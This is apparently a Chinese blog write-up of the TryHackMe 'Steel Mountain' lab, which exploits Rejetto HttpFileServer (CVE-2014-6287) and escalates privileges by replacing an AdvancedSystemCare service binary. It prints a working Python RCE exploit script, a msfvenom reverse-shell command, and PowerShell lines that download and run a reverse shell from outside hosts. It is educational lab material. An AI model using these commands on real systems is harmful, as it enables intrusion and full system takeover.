[tryhackme] Steel Mountain

已于 2024-08-03 17:32:07 修改
阅读量680 收藏 12
点赞数 12
分类专栏: tryhackme 文章标签: 安全 web安全
于 2024-08-03 17:22:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77295404/article/details/140885946
版权

先用nmap扫描端口:

它在8080端口运行着HttpFileServer 。

使用msf

按照题目要求,使用msf查找可用的漏洞:

设置必要的参数,然后exploit

顺利得到第一个flag

下一步要提权,先下载powerup ,然后上传到目标机器

在meterpreter加载powershell

运行powerup

其中AdvancedSystemCareService9的CanRestart是true。也就是说系统中的service可以重启,我们可以用自己制作的service代替它

ServiceName   : AdvancedSystemCareService9
Path          : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
StartName     : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName 'AdvancedSystemCareService9' -Path <HijackPath>
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.40.8 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe

使用上面的命令用msfvenom制作一个反弹shell,并上传到目标机器。如下所示:

在替换目标exe前我们要先停止该服务。

sc stop AdvancedSystemCareService9

把上传的Advanced.exe替换Advanced SystemCare里的ASCService.exe。并在本地用nc开启4443端口进行监听。一切都成功后,重新开启服务

sc start AdvancedSystemCareService9

成功进入系统并获得root

不用msf

按照题目要求,现在尝试不用msf。

先用searchsploit找到httpfileserver的漏洞并下载利用脚本。脚本如下:

#Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 28-11-2020
# Remote: Yes
# Exploit Author: Óscar Andreu
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287

#!/usr/bin/python3

# Usage :  python3 Exploit.py <RHOST> <Target RPORT> <Command>
# Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')"

import urllib3
import sys
import urllib.parse

try:
	http = urllib3.PoolManager()
	url = f'http://{sys.argv[1]}:{sys.argv[2]}/?search=%00{{.+exec|{urllib.parse.quote(sys.argv[3])}.}}'
	print(url)
	response = http.request('GET', url)

except Exception as ex:
	print("Usage: python3 HttpFileServer_2.3.x_rce.py RHOST RPORT command")
	print(ex)

reverse-shell   我们下载左边这个reverse shell,然后下载winPEAS,开启python的http服务,开启nc 4444监听端口。一切都准备好了,就可以输入下面的命令:

python3 exp.py 10.10.248.198 8080 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.38.166:8888/mini-reverse.ps1')"

这是我们看到类似下面的响应,也就是它已经从本地机器上下载reverse-shell到目标机器。

跟之前一样,我们可以轻易找到user的flag

然后我们的监听端口也有相应:

为了提权,我们要下载winPEAS到目标机器:

接下来只要运行winPEAS,然后接下来的操作就跟之前一模一样:现在本地生成一个程序:

停止服务

下载刚生成的程序到目标机器

用下载的程序替换原来的ASCService.exe,然后在本地开启4443端口监听,最后重启服务

现在4443端口有响应,大功告成:

Melody0x0
关注
专栏目录
AsseNeutroPlastico_steel_源码
10-04
标题"AsseNeutroPlastico_steel_源码"涉及到的是钢结构设计中的一个重要概念——塑性中性轴(简称塑性中性轴,也称为塑性铰线或塑性中心),并提到了该主题的源代码实现。在这个场景中,我们主要探讨的是钢结构在...
渗透实战-HttpFileServer漏洞利用
网络安全领域优质创作者
11-05 1829
nmap-T4 -A -sS-sV-vv--script vuln -p- --open -n -Pn10.11.1.49-oX10.11.1.49.xml xsltproc-o10.11.1.49.html10.11.1.49.xml 9505端口运行HttpFileServer服务,搜索HFS得到39161.py修改里面的端口和放置nc.exe 得到shell $secpasswd=ConvertTo-SecureString"aliceishere" -As...
HTTPfileserver rce复现(HFS)
whojoe的博客
07-02 1966
HTTPfileserver rce复现(HFS)环境搭建漏洞复现同一网络环境内网msf小结 环境搭建 hfs在比较早的版本存在命令执行漏洞,2.3c及以前的2.3x版本 下载链接 http://d3.meisq.net:806/1206/hfshttp.zip 打开之后设置默认运行 这里 kaliip192.168.164.129 HFSip192.168.164.128 漏洞复现 同一网络环境 kali配置 msfconsole search hfs use exploit/windows/http
Hackthebox:Optimum Walkthrough(not use metasploit)
汗的博客
12-06 541
信息收集 nmap 10.10.10.8 发现只开了一个80端口的http 浏览器打开 google可知HFS的含义是Http File Server,可以上传文件,页面也显示HttpFileServer 2.3 查找相关漏洞 searchsploit HFS -----------------------------------------------------------------------------------------------------------------------------
利用Metasploit对HFS 2.3渗透攻击提权
渗透测试
05-07 1969
文章目录前言一、Metasploit中使用数据库二、VSFTPD2.3.4渗透攻击1.威胁建模2.攻击3.渗透持久化4.清楚渗透痕迹总结 前言 针对HFS 2.3漏洞进行渗透测试提权(HFS:HttpFileServer) 一、Metasploit中使用数据库 开启步骤 root@kali:~# service postgresql start root@kali:~# msfdb init msfdb ini 初始化数据库 使用msfconsole启动metasploit 输入db_statu
Apache HTTP Server 2.4.50 中的路径遍历和文件泄露漏洞 (CVE-2021-42013)实验报告
weixin_48400575的博客
02-19 4288
Apache HTTP Server 2.4.50 中的路径遍历和文件泄露漏洞 (CVE-2021-42013)复现实验报告
Stability Design of Steel Frame
08-23
Stability Design of Steel Frames provides a summary of the behavior, analysis and design of structural steel members and frames with flexibly-jointed connections. The book presents the theory and ...
Animated Steel Coaster 1.51.rar
08-27
《 Animated Steel Coaster 1.51:Unity插件解析与学习指南》 "Animated Steel Coaster 1.51.rar" 是一个针对Unity游戏引擎的插件资源包,主要用于创建动态、逼真的钢铁过山车模拟体验。该资源包的版本号为1.51,...
WCJH.zip_steel52q
09-24
在IT行业中,文件名"WCJH.zip_steel52q"可能表示一个特定的项目或任务,其中"steel52q"可能是项目代码或负责人标识。这个压缩包包含了一个名为"wB4check.js"的JavaScript文件,这通常意味着文件内包含了与前端开发...
GCGL.rar_steel_钢材
09-22
《钢材综合管理系统详解》 在IT行业中,针对特定行业的信息化管理是提高效率、优化流程的关键。"钢材综合管理系统"就是这样一款专为钢材行业设计的高效工具,它集成了多种功能,旨在实现对钢材生产、库存、销售等...
Http File Server V2.30 WEB服务器
05-12
Http File Server V2.30
httpFileServer
04-10
将自己的电脑编程http服务器,共享文件。
渗透之——Metasploit攻击HFS 2.3上的漏洞
冰河的专栏
01-12 6389
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86358284 攻击机: kali 192.168.109.137 靶机: windows server 2012 192.168.109.141 工具:Metasploit 根据CVE-2014-6287的描述,Rejetto网络文件服务器(也被称为HSF或者HttpFi...
golang http.FileServer 遇到的坑
小码农的博客
03-04 6082
上次写了一个2行实现一个静态服务器的 文章 今天群里有个哥们是这么写居然返回的是404 见鬼了嘛?? http.handle("/js", http.FileServer(http.Dir("js")) http.ListenAndServe("8080", nil) 大概的意思就是绑定 路由为 js 的时候访问这个js 文件夹  看了一下确实代码上面没什么毛病。但是路径怎么修
CVE-2014-6287漏洞利用
yeshankuangrenaaaaa的博客
07-23 1536
目录CVE-2014-6287漏洞利用漏洞描述参考链接漏洞描述漏洞威胁版本漏洞复现靶机环境准备攻击浏览器方式脚本方式kali-msf工具复现结论 CVE-2014-6287漏洞利用 漏洞描述 参考链接 CVE-2014-6287 漏洞描述 发布时间:2014-09-15漏洞平台:windows 漏洞应用:HttpFileServer_v2.3_search命令执行漏洞 HTTPFileServer是一款专为个人用户所设计的HTTP文件服务器。Rejetto网站提供的HTTPFileServer 2.3b
Rejetto HTTP文件服务器 未授权RCE漏洞复现(CVE-2024-23692)
最新发布
0xSec
06-11 2492
Rejetto HTTP File Server 2.3m及之前版本存在安全漏洞,该漏洞源于存在模板注入漏洞。成功利用这一漏洞的攻击者可以进行远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令。
【全功能专用】Http File Server (HFS) 专用HFS模板 分享!
热门推荐
准女婿的博客
08-07 1万+
在原版基础上进行优化,界面清爽优雅,格式整齐。 可自由切换显示/隐藏左边功能区。 1、新增“留言板”功能,支持QQ表情功能; 2、新增服务器通讯状态; 3、新增显示“注释”列,优化注释(鼠标焦点自动显示注释),避免影响界面美观; 4、优化最新标志、上传功能、优化一些操作习惯和界面格式;
ActiveMQ FileServer漏洞(详细)
weixin_30498921的博客
06-23 612
半个月前,巡检时发现服务器出现不明进程,对其进行了处理,由于当时没有做详细记录,在这里把大致过程描述一下. 症状: ps命令发现出现几个不明进程,   1.于/tmp下运行的,名称随机的进程.占用CPU高达100%,确认为挖矿机   2.于activemq下运行的不明进程,占用CPU很低,kill -9 杀死进程后会自动重启(当时以为是activemq的正常进程,后核对后发现该进程不属于a...
severstal steel数据集
11-05
Severstal Steel数据集是俄罗斯Severstal公司公开的一个数据集,包含了大量关于钢铁生产过程的信息。这个数据集主要用于机器学习和数据分析领域的研究和实践。 Severstal Steel数据集的特点是数据的多样性和数量的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值